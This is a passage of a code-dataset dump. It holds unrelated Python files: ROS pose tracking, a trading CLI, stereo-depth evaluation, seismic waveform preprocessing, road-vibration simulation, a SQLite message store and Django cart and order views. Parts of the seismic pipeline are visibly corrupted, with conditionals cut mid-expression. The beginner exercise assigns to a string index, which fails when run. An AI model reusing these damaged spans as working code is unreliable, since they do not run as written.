data.num_humans\n h_list = data.human_list\n rospy.loginfo(\"#persons: \" + str(n_humans))\n\n if n_humans > 0:\n points = []\n\n for e in h_list:\n temp = OpenPoseHuman()\n temp = e\n # rospy.loginfo('t= {}'.format(temp))\n # rospy.loginfo('t= {0}'.format(temp.body_key_points_with_prob))\n parts = len(temp.body_key_points_with_prob)\n for i in range(0, parts):\n point = PointWithProb()\n point = temp.body_key_points_with_prob[i]\n if point.prob > 0:\n # rospy.loginfo(\"part: {0}, (x,y): ({1}, {2})\".format(i+1, point.x, point.y))\n points.append((point.x, point.y))\n # rospy.loginfo('###############################')\n # rospy.loginfo('--------------------------')\n points_matrix = np.array(points).reshape((-1, 1, 2)).astype(np.int32)\n # rospy.loginfo('points : {0}'.format(points))\n rect = cv2.boundingRect(points_matrix)\n ROI = RegionOfInterest()\n ROI.x_offset = int(rect[0])\n ROI.y_offset = int(rect[1])\n ROI.width = int(rect[2])\n ROI.height = int(rect[3])\n ROI.do_rectify = True\n self.roi_pub.publish(ROI)\n\n def image_callback(self, data):\n global rect, bridge\n try:\n frame = bridge.imgmsg_to_cv2(data, \"bgr8\")\n if rect is not None:\n cv2.rectangle(frame, (rect[0], rect[1]), (rect[0] + rect[2], rect[1] + rect[3]), (0, 255, 255), 1)\n\n cv2.imshow('Openpose-Tracker', frame)\n cv2.waitKey(1)\n\n except CvBridgeError as e:\n pass\n except Exception as e:\n pass\n\n\nif __name__ == '__main__':\n OpenPoseROSTracker()\n","sub_path":"hri_arvr/scripts/trackers/openpose_tracker.py","file_name":"openpose_tracker.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"504771796","text":"from SimpleBreakoutStrategy import SimpleBreakoutStrategy\n\nclass Follower:\n def __init__(self):\n self.simpleBreakoutStrategy=SimpleBreakoutStrategy()\n\n def follow(self, strategy, universe, buyXHigh, sellYLow, startDate, curDate,\n totalAmount, riskPerTrade, riskPerGroup, riskInDirection, riskTotal):\n if strategy=='simple':\n self.simpleBreakoutStrategy.follow(universe, buyXHigh, sellYLow, startDate, curDate,\n totalAmount, riskPerTrade, riskPerGroup, riskInDirection, riskTotal)\n return True\n else:\n print(\"Strategy %s is not implemented\" % strategy)\n return False\n\n\n#main block\nif __name__=='__main__':\n import argparse\n parser=argparse.ArgumentParser()\n parser.add_argument(\"--strategy\", help=\"Supported strategy is simple\", default=\"simple\")\n parser.add_argument(\"--universe\", help=\"Supported universe is fno\", default=\"fno\")\n parser.add_argument(\"--buyxhigh\", help=\"Number of days to breakout for long\", default=20)\n parser.add_argument(\"--sellylow\", help=\"Number of days to breakout for short\", default=10)\n parser.add_argument(\"--startdate\", help=\"The start date for trading\", default=\"2018-06-21\")\n parser.add_argument(\"--curdate\", help=\"The current date for trading\", default=\"2018-06-21\")\n parser.add_argument(\"--totalamount\", help=\"Total amount for equity\", default=1000000)\n parser.add_argument(\"--riskpertrade\", help=\"Risk percent per trade\", default=1.0)\n parser.add_argument(\"--riskpergroup\", help=\"Risk percent per group\", default=5.0)\n parser.add_argument(\"--riskindirection\", help=\"Risk percent in any direction\", default=10.0)\n parser.add_argument(\"--risktotal\", help=\"Total risk percent\", default=20.0)\n\n args=parser.parse_args()\n args.buyxhigh=int(args.buyxhigh)\n args.sellylow=int(args.sellylow)\n\n follower=Follower()\n follower.follow(args.strategy, args.universe, args.buyxhigh, args.sellylow, args.startdate,\n args.curdate, args.totalamount, args.riskpertrade, args.riskpergroup,\n args.riskindirection, args.risktotal)","sub_path":"trendfollowing/core/Follower.py","file_name":"Follower.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"457435232","text":"\"\"\"\nAuthor: Isabella Liu 7/19/21\nFeature: Test cascade-stereo model on sim-real dataset\n\"\"\"\n\nimport os\nimport argparse\nimport torch\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom models.psmnet import PSMNet\nfrom datasets.messytable_test_dataset import get_test_loader\nfrom utils.metrics import compute_err_metric, compute_obj_err\nfrom utils.messytable_dataset_config import cfg\nfrom utils.messytable_util import get_time_string, setup_logger, \\\n depth_error_img, disp_error_img, save_img, save_obj_err_file\nfrom utils.warp_ops import apply_disparity_cu\n\nparser = argparse.ArgumentParser(description='Testing for Cascade-Stereo on messy-table-dataset')\nparser.add_argument('--config-file', type=str, default='./CasStereoNet/configs/local_test_config.yaml',\n metavar='FILE', help='Config files')\nparser.add_argument('--model', type=str, default='', metavar='FILE', help='Path to test model')\nparser.add_argument('--output', type=str, default='./testing_output', help='Path to output folder')\nparser.add_argument('--debug', action='store_true', default=False, help='Debug mode')\nparser.add_argument('--annotate', type=str, default='', help='Annotation to the experiment')\nparser.add_argument('--onreal', action='store_true', default=False, help='Test on real dataset')\nparser.add_argument('--analyze-objects', action='store_true', default=True, help='Analyze on different objects')\nparser.add_argument('--exclude-bg', action='store_true', default=False, help='Exclude background when testing')\nparser.add_argument('--warp-op', action='store_true', default=True, help='whether use warp_op function to get disparity')\nargs = parser.parse_args()\ncfg.merge_from_file(args.config_file)\n\n\ndef test(model, val_loader, logger, log_dir):\n model.eval()\n total_err_metrics = {'epe': 0, 'bad1': 0, 'bad2': 0,\n 'depth_abs_err': 0, 'depth_err2': 0, 'depth_err4': 0, 'depth_err8': 0}\n total_obj_disp_err = np.zeros(cfg.SPLIT.OBJ_NUM)\n total_obj_depth_err = np.zeros(cfg.SPLIT.OBJ_NUM)\n total_obj_count = np.zeros(cfg.SPLIT.OBJ_NUM)\n os.mkdir(os.path.join(log_dir, 'pred_disp'))\n os.mkdir(os.path.join(log_dir, 'gt_disp'))\n os.mkdir(os.path.join(log_dir, 'pred_disp_abs_err_cmap'))\n os.mkdir(os.path.join(log_dir, 'pred_depth'))\n os.mkdir(os.path.join(log_dir, 'gt_depth'))\n os.mkdir(os.path.join(log_dir, 'pred_depth_abs_err_cmap'))\n\n for iteration, data in enumerate(tqdm(val_loader)):\n img_L = data['img_L'].cuda()\n img_R = data['img_R'].cuda()\n\n img_disp_l = data['img_disp_l'].cuda()\n img_depth_l = data['img_depth_l'].cuda()\n img_label = data['img_label'].cuda()\n img_focal_length = data['focal_length'].cuda()\n img_baseline = data['baseline'].cuda()\n prefix = data['prefix'][0]\n\n # If using warp_op, computing img_disp_l from img_disp_r\n if args.warp_op:\n img_disp_r = data['img_disp_r'].cuda()\n img_depth_r = data['img_depth_r'].cuda()\n img_disp_l = apply_disparity_cu(img_disp_r, img_disp_r.type(torch.int))\n img_depth_l = apply_disparity_cu(img_depth_r, img_disp_r.type(torch.int)) # [bs, 1, H, W]\n\n # If test on real dataset need to crop input image to (540, 960)\n if args.onreal:\n img_L = F.interpolate(img_L, (540, 960))\n img_R = F.interpolate(img_R, (540, 960))\n\n img_disp_l = F.interpolate(img_disp_l, (540, 960))\n img_depth_l = F.interpolate(img_depth_l, (540, 960))\n img_label = F.interpolate(img_label, (540, 960)).type(torch.int)\n\n # Pad the imput image and depth disp image to 960 * 544\n right_pad = cfg.REAL.PAD_WIDTH - 960\n top_pad = cfg.REAL.PAD_HEIGHT - 540\n img_L = F.pad(img_L, (0, right_pad, top_pad, 0, 0, 0, 0, 0), mode='constant', value=0)\n img_R = F.pad(img_R, (0, right_pad, top_pad, 0, 0, 0, 0, 0), mode='constant', value=0)\n\n if args.exclude_bg:\n # Mask ground pixel to False\n img_ground_mask = (img_depth_l > 0) & (img_depth_l < 1.25)\n mask = (img_disp_l < cfg.ARGS.MAX_DISP) * (img_disp_l > 0) * img_ground_mask\n else:\n mask = (img_disp_l < cfg.ARGS.MAX_DISP) * (img_disp_l > 0)\n mask = mask.type(torch.bool)\n mask.detach_() # [bs, 1, H, W]\n\n ground_mask = torch.logical_not(mask).squeeze(0).squeeze(0).detach().cpu().numpy()\n\n with torch.no_grad():\n outputs = model(img_L, img_R)\n pred_disp = outputs['stage2']['pred'] # [bs, H, W]\n pred_disp = pred_disp.unsqueeze(1) # [bs, 1, H, W]\n pred_disp = pred_disp[:, :, top_pad:, :] # TODO: if right_pad > 0 it needs to be (:-right_pad)\n pred_depth = img_focal_length * img_baseline / pred_disp # pred depth in m\n\n # Get loss metric\n err_metrics = compute_err_metric(img_disp_l, img_depth_l, pred_disp, img_focal_length,\n img_baseline, mask)\n for k in total_err_metrics.keys():\n total_err_metrics[k] += err_metrics[k]\n logger.info(f'Test instance {prefix} - {err_metrics}')\n\n # Get object error\n obj_disp_err, obj_depth_err, obj_count = compute_obj_err(img_disp_l, img_depth_l, pred_disp, img_focal_length,\n img_baseline, img_label, mask, cfg.SPLIT.OBJ_NUM)\n total_obj_disp_err += obj_disp_err\n total_obj_depth_err += obj_depth_err\n total_obj_count += obj_count\n\n # Get disparity image\n pred_disp_np = pred_disp.squeeze(0).squeeze(0).detach().cpu().numpy() # [H, W]\n pred_disp_np[ground_mask] = -1\n\n # Get disparity ground truth image\n gt_disp_np = img_disp_l.squeeze(0).squeeze(0).detach().cpu().numpy()\n gt_disp_np[ground_mask] = -1\n\n # Get disparity error image\n pred_disp_err_np = disp_error_img(pred_disp, img_disp_l, mask)\n\n # Get depth image\n pred_depth_np = pred_depth.squeeze(0).squeeze(0).detach().cpu().numpy() # in m, [H, W]\n # crop depth map to [0.2m, 2m]\n # pred_depth_np[pred_depth_np < 0.2] = -1\n # pred_depth_np[pred_depth_np > 2] = -1\n pred_depth_np[ground_mask] = -1\n\n # Get depth ground truth image\n gt_depth_np = img_depth_l.squeeze(0).squeeze(0).detach().cpu().numpy()\n gt_depth_np[ground_mask] = -1\n\n # Get depth error image\n pred_depth_err_np = depth_error_img(pred_depth * 1000, img_depth_l * 1000, mask)\n\n del pred_disp, pred_depth, outputs, img_L, img_R\n\n # Save images\n save_img(log_dir, prefix, pred_disp_np, gt_disp_np, pred_disp_err_np,\n pred_depth_np, gt_depth_np, pred_depth_err_np)\n\n # Get final error metrics\n for k in total_err_metrics.keys():\n total_err_metrics[k] /= len(val_loader)\n logger.info(f'\\nTest on {len(val_loader)} instances\\n {total_err_metrics}')\n\n # Save object error to csv file\n total_obj_disp_err /= total_obj_count\n total_obj_depth_err /= total_obj_count\n save_obj_err_file(total_obj_disp_err, total_obj_depth_err, log_dir)\n\n logger.info(f'Successfully saved object error to obj_err.txt')\n\n\ndef main():\n # Obtain the dataloader\n val_loader = get_test_loader(cfg.SPLIT.VAL, args.debug, sub=10, isTest=True, onReal=args.onreal)\n\n # Tensorboard and logger\n os.makedirs(args.output, exist_ok=True)\n log_dir = os.path.join(args.output, f'{get_time_string()}_{args.annotate}')\n os.mkdir(log_dir)\n logger = setup_logger(\"CascadeStereo Testing\", distributed_rank=0, save_dir=log_dir)\n logger.info(f'Annotation: {args.annotate}')\n logger.info(f'Input args {args}')\n logger.info(f'Loaded config file \\'{args.config_file}\\'')\n logger.info(f'Running with configs:\\n{cfg}')\n\n # Get the model\n logger.info(f'Loaded the checkpoint: {args.model}')\n model = PSMNet(\n maxdisp=cfg.ARGS.MAX_DISP,\n ndisps=[int(nd) for nd in cfg.ARGS.NDISP],\n disp_interval_pixel=[float(d_i) for d_i in cfg.ARGS.DISP_INTER_R],\n cr_base_chs=[int(ch) for ch in cfg.ARGS.CR_BASE_CHS],\n grad_method=cfg.ARGS.GRAD_METHOD,\n using_ns=cfg.ARGS.USING_NS,\n ns_size=cfg.ARGS.NS_SIZE\n )\n state_dict = torch.load(args.model)\n model.load_state_dict(state_dict['model'])\n model.cuda()\n test(model, val_loader, logger, log_dir)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"CasStereoNet/test_on_sim_real.py","file_name":"test_on_sim_real.py","file_ext":"py","file_size_in_byte":8469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"197423760","text":"a=123\na=-178\na=0\na=1.2\na=3.45\na=4.24E10\na=4.24e-10\na=0o177\na=0x8ff\n\na=3\nb=4\na**b\n\nprint(\"=\"*50)\nprint(\"My Program\")\nprint(\"=\"*50)\n\na=\"Life is too short, You need Python\"\nprint(a[3])\nprint(a[4])\n\nprint(a[0:4])\nprint(a[12:17])\n\na=\"20010331Rainy\"\ndate=a[:8]\nweather = a[8:]\nprint(date)\nprint(weather)\nyear=a[:4]\nday=a[4:8]\nprint(\"Year : %s\" %year)\nprint(\"Day : %s\" %weather)\na = \"Pithon\"\na[1] = \"y\"\nprint(a)\n\n\n","sub_path":"src/python/chapter2/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583929493","text":"\"\"\" Data pipeline (CPU version)\n\"\"\"\nimport os\nimport glob\nimport time\nimport numpy as np\nimport multiprocessing as mp\nfrom obspy import read, UTCDateTime\nimport config\n\ncfg = config.Config()\n# i/o paths\nfpha = cfg.fpha_in\n# params\nnum_workers = cfg.num_workers_read\nto_prep = cfg.to_prep\nsamp_rate = cfg.samp_rate\nfreq_band = cfg.freq_band\nwin_data_p = cfg.win_data_p\nwin_data_s = cfg.win_data_s\nwin_temp_p = cfg.win_temp_p\nwin_temp_s = cfg.win_temp_s\nchn_p = cfg.chn_p\nchn_s = cfg.chn_s\nnpts_data_p = int(samp_rate*sum(win_data_p))\nnpts_data_s = int(samp_rate*sum(win_data_s))\nnpts_temp_p = int(samp_rate*sum(win_temp_p))\nnpts_temp_s = int(samp_rate*sum(win_temp_s))\nnum_sta_thres = cfg.num_sta_thres[0] # min sta \n\ndef read_event(fpha, event_root):\n # 1. read phase file\n print('reading phase file')\n event_list = read_fpha(fpha)\n num_events = len(event_list)\n\n # 2. read event data\n print('reading event waveform')\n t=time.time()\n if num_workers==1:\n for evid, event in enumerate(event_list): \n event_loc, pha_dict_data = read_one_event(event, event_root)\n if evid%100==0: print('read/total events {}/{} | time {:.1f}s'.format(evid, num_events, time.time()-t))\n if len(pha_dict_data)st[0].stats.endtime:\n data_p, temp_p, norm_data_p, norm_temp_p, ttp = [None]*5\n else:\n data_p = st2np(st.slice(tp-win_data_p[0], tp+win_data_p[1]), npts_data_p)[chn_p]\n temp_p = st2np(st.slice(tp-win_temp_p[0], tp+win_temp_p[1]), npts_temp_p)[chn_p]\n norm_data_p = calc_norm(data_p, npts_temp_p)\n norm_temp_p = np.array([sum(tr**2)**0.5 for tr in temp_p])\n ttp = tp - event_loc[0]\n else: data_p, temp_p, norm_data_p, norm_temp_p, ttp = [None]*5\n if ts!=-1:\n if ts+max(win_data_s[1],win_temp_s[1])>st[0].stats.endtime \\\n or ts-max(win_data_s[0],win_temp_s[0])end_time: print('bad data!'); return []\n st = stream.slice(start_time, end_time)\n # resample data\n org_rate = int(st[0].stats.sampling_rate)\n rate = np.gcd(org_rate, samp_rate)\n if rate==1: print('warning: bad sampling rate!'); return []\n decim_factor = int(org_rate / rate)\n resamp_factor = int(samp_rate / rate)\n if decim_factor!=1: st = st.decimate(decim_factor)\n if resamp_factor!=1: st = st.interpolate(samp_rate)\n # filter\n st = st.detrend('demean').detrend('linear').taper(max_percentage=0.05, max_length=10.)\n flt_type, freq_rng = freq_band\n if flt_type=='highpass':\n return st.filter(flt_type, freq=freq_rng)\n if flt_type=='bandpass':\n return st.filter(flt_type, freqmin=freq_rng[0], freqmax=freq_rng[1])\n\ndef read_stream(stream_paths):\n stream = read(stream_paths[0])\n stream += read(stream_paths[1])\n stream += read(stream_paths[2])\n if to_prep: return preprocess(stream)\n else: return stream\n\ndef calc_norm(data, npts):\n data_cum = [np.cumsum(di**2) for di in data]\n return np.array([np.sqrt(cumi[npts:]-cumi[:-npts]) for cumi in data_cum])\n\n# format transform\ndef st2np(stream, npts):\n st_np = np.zeros([len(stream), npts], dtype=np.float64)\n for i,trace in enumerate(stream): st_np[i][0:npts] = trace.data[0:npts]\n return st_np\n\n","sub_path":"hypodd/small/dataset_ph2dt_cc.py","file_name":"dataset_ph2dt_cc.py","file_ext":"py","file_size_in_byte":6219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121310274","text":"import json\nimport os\n\nfrom django.shortcuts import render\nimport requests\n\nfrom double_post_check.forms import Post\n\n\ndef index(request):\n context = {'form': Post}\n\n if request.method == 'POST':\n form = Post(request.POST)\n if form.is_valid():\n message = form.cleaned_data['text']\n if message:\n response = json.loads(requests.get(\n os.environ['DOUBLE_POST_URL'],\n params={'message': message}\n ).text)\n if response['display']:\n context['previous'] = {\n 'input': message,\n 'display': response['display']\n }\n else:\n context['all_clear'] = True\n\n return render(\n request,\n 'double_post_check/index.html',\n context,\n )\n","sub_path":"double_post_check/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"187657164","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy as sp\nfrom scipy import signal\nimport math\nfrom scipy.io import wavfile\nimport wavio\nfrom scipy import interpolate\nimport soundfile as sf\nfrom librosa import resample\nimport scipy.signal as sps\n#Todo: Una CDF diversa per ogni banda in frequenza per i transienti. Però andrebbero identificati come righe, non come intervalli, se sono crack. La strada brutta, on the other hand, non è un crack ma è un brutto uniforme, e ci si aspetta che porti a un aumento del livello medio broadband.\nfile='F:/pint/Misure Coltano/pint/unzipped/run_spezzate/giro_lungo.wav'\nsampling_rate, data=wavfile.read(file)\ndurabin=0.2 #Durata in secondi di ogni intervallo su cui fare la PSD\n#Data_IRF=data[559*44100:594*44100]\nIRF=plottapsdbucata(data, (559, 594)) #Asse X è in IRF[1], asse Y è in IRF[0], moltiplica sempre il segnale per IRF[0] e plotta irf[1],sig*irf[0]\nIRF=np.array(IRF)\n#IRF[0]/=(35/durabin) #Riporto la potenza a valori contenuti in 0.2 secondi\nplt.close() #per rivederlo: plt.loglog(IRF[1], IRF[0])\npezzobello=data[559*44100:594*44100]\ncrack=data[167*44100:174*44100]\nscale=813.5330/32767\n\n\n#Da debuggare, vedi descrizione.\ndef PSDToSeries(lenTimeSeries,freq,psdLoad):\n '''\n Genera una serie temporale compatibile con la PSD fornita in input. Per qualche ragione mi raddoppia le frequenze. Vabè.\n\n '''\n #\n #Intervallo in frequenza\n df=freq[1]-freq[0]\n #print('df = ', df)\n\n spettro0=psdLoad\n irf0=IRF[1]\n f=interpolate.interp1d(irf0, spettro0, kind='linear')\n irf1=np.linspace(IRF[1][0], IRF[1][-1], num=int(lenTimeSeries))\n spettro1=f(irf1)\n binwidth=(irf1[1:]-irf1[:-1])[0]\n #Ampiezze spettrali, prese dai bin PSD: attenzione che è dilatato dall'oversampling\n amplitude=np.sqrt(4*spettro1*binwidth)\n\n #creo i vettori\n epsilon=np.zeros((len(amplitude)))\n randomSeries=np.zeros((len(amplitude)))\n\n\n #Creo la serie temporale: fase random tra -pi e pi\n #Generate random phases between [-2pi,2pi]\n epsilon=np.pi * (2*np.random.randn(1,len(amplitude))-1)\n\n #Inverse Fourier\n randomSeries=np.real(np.fft.ifft(amplitude*np.exp(epsilon*1j*2*np.pi)))\n\n return np.reshape(randomSeries, np.shape(randomSeries)[1])#faglielo direttamente riuscire col resampling perché qui è a 22050 Hz\n\n# Genera un rumore bianco di media mean varianza std lungo seconds (campionato a 44100 Hz)\ndef genwhite (mean, std, seconds):\n num_samples = 44100\n samples = np.random.normal(mean, std, size=math.floor(seconds*num_samples))\n return (samples)\n\ndef genstradabella(s):\n return(genwhite(1,5.54e-3,s))\n\n# def genspettrobello(irf=IRF):\n# logmean=1.0186691440524822\n# logvar=0.1763178502675603\n# mean=-2*log(logmean)-0.5*np.log(logvar+logmean**2)\n# std=np.sqrt(-2*log(logmean)+np.log(logvar+logmean**2))\n# #std=0.42\n# spettro=np.random.lognormal(mean, std, 2049)\n return (spettro*IRF[0])\n\ndef genspettroIRF(CDF, pdf):\n spettro=FromCDF(CDF,pdf)\n return (np.array(spettro)*IRF[0])\n\n\n# Genera il segnale atteso da una buca che dura seconds secondi, campionato a 44100 Hz\n# Per ora è un segnale sinusoidale con finestra gaussiana senza posibilità di variarlo in intensità o in frequenza, magari più in avanti sarà più raffinato man mano che la nostra conoscenza delle buche migliora\ndef pothole (seconds): # a 40km/h fai 30 cm (tombino quadratico medio) in 0.27 secondi\n samples=math.floor(seconds*44100)\n a=np.linspace(0,20,num=samples)\n b=20*np.sin(100*a)\n wind=signal.windows.gaussian(samples, std=samples/10)\n return(b*wind)\n\n#Fa lo zero padding di un vettore: center è la posizione in secondi, length è la durata a cui vogliamo paddare il vettore vector\ndef zeropad (vector, center, length):\n sampling=44100\n center=center*sampling\n length=length*sampling\n before=math.floor(center-math.floor(len(vector)/2))\n after=length-(len(vector)+before)\n beforev=np.zeros(before)\n afterv=np.zeros(after)\n padded1=np.concatenate ([beforev,vector])\n padded=np.concatenate ([padded1,afterv])\n return (padded)\n\n#Buca una strada: somma buca a strada nella posizione dove in secondi. Si occupa da solo dello zeropadding\ndef bucastrade (strada, buca, dove):\n stradabucata=strada+zeropad(buca, dove, math.floor(len(strada)/44100))\n xvec=(np.linspace(0,len(strada)/44100, num=len(strada)))\n return (xvec, stradabucata)\n\ndef FromCDF (CDF, pdf):\n CDF=np.array(CDF)\n randx=[]\n for j in range (0,2049):\n xi=np.random.random()\n randx.append(pdf[1][np.max(np.where(CDF Illegal message detected!\")\n print(\"Someone tried to write to a finished sequence.\")\n\n msg_entries = [(msg.__hash__(), msg.sender.hex, msg.seq_number, msg.message_content, False) for msg in msg_objects]\n \n # print(msg_entries)\n\n cursor.executemany(\"\"\"\n INSERT OR IGNORE INTO message VALUES (?,?,?,?,?);\n \"\"\", msg_entries)\n\n conn.commit()\n conn.close()\n except Exception as e:\n print(e)\n traceback.print_exc()\n \n\ndef store_messages_in_pool(messages: [], pool):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n msg_objects = node_message.message_bulk_to_message_array(messages)\n \n msg_entries = [(hash(msg), pool.hex) for msg in msg_objects]\n\n # print(msg_entries)\n\n cursor.executemany(\"\"\"\n INSERT OR IGNORE INTO message_pool VALUES (?,?);\n \"\"\", msg_entries)\n conn.commit()\n conn.close()\n\ndef store_message_with_pool(messages: [], pool):\n store_messages(messages)\n store_messages_in_pool(messages, pool)\n\ndef is_a_message_not_already_stored(messages: []):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n for m in messages:\n cursor.execute(\"\"\"SELECT 1 FROM message WHERE message.msg_hash = ?\"\"\", (hash(m)))\n result = cursor.fetchall()\n if len(result) < 1:\n return True\n return False\n\ndef get_message_for_pool(msg_pool):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n pool_entry = (msg_pool.hex,)\n\n cursor.execute(\"\"\"\n SELECT sender, seq_number, message FROM message JOIN message_pool ON message.msg_hash = message_pool.msg_hash WHERE message_pool.msg_pool = ?;\n \"\"\", pool_entry)\n\n msg_entries = cursor.fetchall()\n messages = [node_message.make_queue_message(uuid.UUID(hex=msg_entry[0]), msg_entry[1], msg_entry[2]) for msg_entry in msg_entries]\n\n conn.close()\n return messages\n\n\ndef get_message_for_pool_and_seq(msg_pool, seq_number):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n pool_entry = (msg_pool.hex, seq_number)\n\n cursor.execute(\"\"\"\n SELECT sender, seq_number, message FROM message JOIN message_pool ON message.msg_hash = message_pool.msg_hash WHERE message_pool.msg_pool = ? AND message.seq_number = ?;\n \"\"\", pool_entry)\n\n msg_entries = cursor.fetchall()\n messages = [node_message.make_queue_message(uuid.UUID(hex=msg_entry[0]), msg_entry[1], msg_entry[2]) for msg_entry in msg_entries]\n\n conn.close()\n return messages\n\ndef store_round(seq):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n seq = (seq,)\n\n cursor.execute(\"\"\"\n UPDATE message SET confirmed = 1 WHERE seq_number = ?;\n \"\"\", seq)\n\n conn.commit()\n conn.close()\n\ndef get_messages_for_round(seq_number):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n\n cursor.execute(\"\"\"\n SELECT sender, seq_number, message FROM message WHERE seq_number = ? ORDER BY message.msg_hash DESC\n \"\"\", (seq_number,))\n\n msg_entries = cursor.fetchall()\n messages = [node_message.make_queue_message(uuid.UUID(hex=msg_entry[0]), msg_entry[1], msg_entry[2]) for msg_entry in msg_entries]\n\n conn.close()\n\n return messages\n","sub_path":"src/node_message_store.py","file_name":"node_message_store.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"65594379","text":"#coding=utf-8\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.shortcuts import render_to_response, redirect, get_object_or_404\nfrom django.template import RequestContext\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import *\nfrom decimal import Decimal\nfrom apps.accounts.models import Address, UserProfile\nfrom lib.common import generate_pagination\nfrom django.contrib.auth.decorators import permission_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\n@login_required\ndef cart_details(request):\n title = _(u'我的购物车')\n obj_list = Cart.objects.filter(account=request.user, amount__gt=0)\n sum_price = Decimal(0)\n points_form = UserPointsForm(request.user)\n messages = []\n try:\n profile = UserProfile.objects.get(user=request.user)\n except UserProfile.DoesNotExist:\n pass\n for i in obj_list:\n #计算总价\n if i.product.is_sale:\n sum_price += i.amount * Decimal(i.product.sale_price)\n else:\n sum_price += i.amount * Decimal(i.product.price)\n #处理购物车内超过库存的数据\n if i.amount > i.product.stocks:\n i.amount = i.product.stocks\n i.save()\n if i.amount > 0:\n messages.append(u'“%(name)s”只剩下%(count)s件了,已为您重新设置了数量' % {'name': i.product.brand + i.product.name, 'count': i.amount})\n else:\n messages.append(u'“%(name)s”没有货了,已为您取消了' % {'name': i.product.brand + i.product.name})\n address_list = Address.objects.filter(user=request.user).order_by('-is_default')\n #取地址表单\n if address_list:\n default_pk = address_list[0].pk\n for i in address_list:\n if i.is_default:\n default_pk = i.pk\n address_form = SelectAddressForm(default_pk=default_pk)\n address_form.fields['address'].queryset = address_list\n return render_to_response(\"cart.html\", locals(), context_instance=RequestContext(request))\n\n\n@login_required\ndef ajax_get_cart_count(request):\n count = ''\n if request.user.is_authenticated():\n count = Cart.objects.filter(account=request.user, amount__gt=0).count()\n return HttpResponse(count)\n\n\n@login_required\ndef ajax_cart_edit(request):\n if request.method == 'POST':\n if request.user.is_authenticated() and request.POST.has_key('id') and request.POST.has_key('amount'):\n new_amount = 0\n try:\n new_amount = int(request.POST.get('amount', 0))\n except ValueError:\n return HttpResponse(status=404)\n try:\n cart = Cart.objects.get(account=request.user, pk=request.POST.get('id', u''))\n cart.amount = new_amount\n cart.save()\n obj_list = Cart.objects.filter(account=request.user)\n sum_price = Decimal(0)\n for i in obj_list:\n if i.product.is_sale:\n sum_price += i.amount * Decimal(i.product.sale_price)\n else:\n sum_price += i.amount * Decimal(i.product.price)\n return HttpResponse(sum_price)\n except Cart.DoesNotExist:\n return HttpResponse(status=404)\n else:\n return HttpResponse(status=402)\n return HttpResponse(status=403)\n\n\nfrom django.db import transaction\n@login_required\ndef order_create(request):\n with transaction.commit_on_success():\n if request.method == 'POST':\n point_form = UserPointsForm(data=request.POST, user=request.user)\n use_points = 0\n if point_form.is_valid():\n use_points = point_form.cleaned_data['points']\n addr_form = SelectAddressForm(data=request.POST, default_pk=None)\n addr_form.fields['address'].queryset = Address.objects.filter(user=request.user).order_by('-is_default')\n if addr_form.is_valid():\n try:\n addr = Address.objects.get(user=request.user, pk=addr_form.cleaned_data['address'].pk)\n except Address.DoesNotExist:\n return redirect('cart_details')\n try:\n cart_list = Cart.objects.filter(account=request.user, amount__gt=0)\n #购物车内有东西时���创建订单\n if cart_list:\n order = Order(\n status=u'已保存',\n account=request.user,\n amount=0,\n use_points=use_points,\n need_pay=0,\n ship_name=addr.name,\n ship_mobile=addr.mobile,\n ship_address=addr.address,\n extra=addr_form.cleaned_data['extra']\n )\n order.save()\n sum_price = 0\n for i in cart_list:\n if i.amount > i.product.stocks:\n #订购数量超过库存就把订单和所有记录删掉,返回订单提交页\n order.delete()\n return redirect('cart_details')\n price = 0\n if i.product.is_sale:\n price = i.product.sale_price\n else:\n price = i.product.price\n order_product = OrderProduct.objects.create(\n product_id=i.product.pk,\n product_count=i.amount,\n product_name=i.product.brand + i.product.name,\n product_price=price,\n prodct_purchase_price=i.product.purchase_price,\n product_no=i.product.no,\n product_barcode=i.product.barcode,\n product_catalog=i.product.catalog.pk,\n product_cover=i.product.cover\n )\n order_product.save()\n order.products.add(order_product)\n if i.product.is_sale:\n sum_price += i.amount * Decimal(i.product.sale_price)\n else:\n sum_price += i.amount * Decimal(i.product.price)\n order.amount = sum_price\n order.need_pay = sum_price - Decimal(use_points) * Decimal('0.01')\n #首先保证有profile\n try:\n profile = UserProfile.objects.get(user=request.user)\n #如果使用点数超过总价,则设置为最大\n if not order.need_pay > 0:\n order.need_pay = 0\n order.use_points = float(sum_price) / 0.01\n order.amount = sum_price\n order.need_pay = 0\n profile.points -= order.use_points\n else:\n profile.points -= use_points\n profile.save()\n except UserProfile.DoesNotExist:\n pass\n\n order.save()\n Cart.objects.filter(account=request.user).delete()\n return redirect('order_details', order.pk)\n else:\n return redirect('cart_details')\n except Cart.DoesNotExist:\n pass\n else:\n return redirect('cart_details')\n\n return HttpResponse(status=404)\n\n\n@login_required\ndef order_list(request):\n title = _(u'我的订单')\n page = request.GET.get('page', '1')\n page_size = 10\n try:\n page = int(page)\n except ValueError:\n page = 1\n order_list = 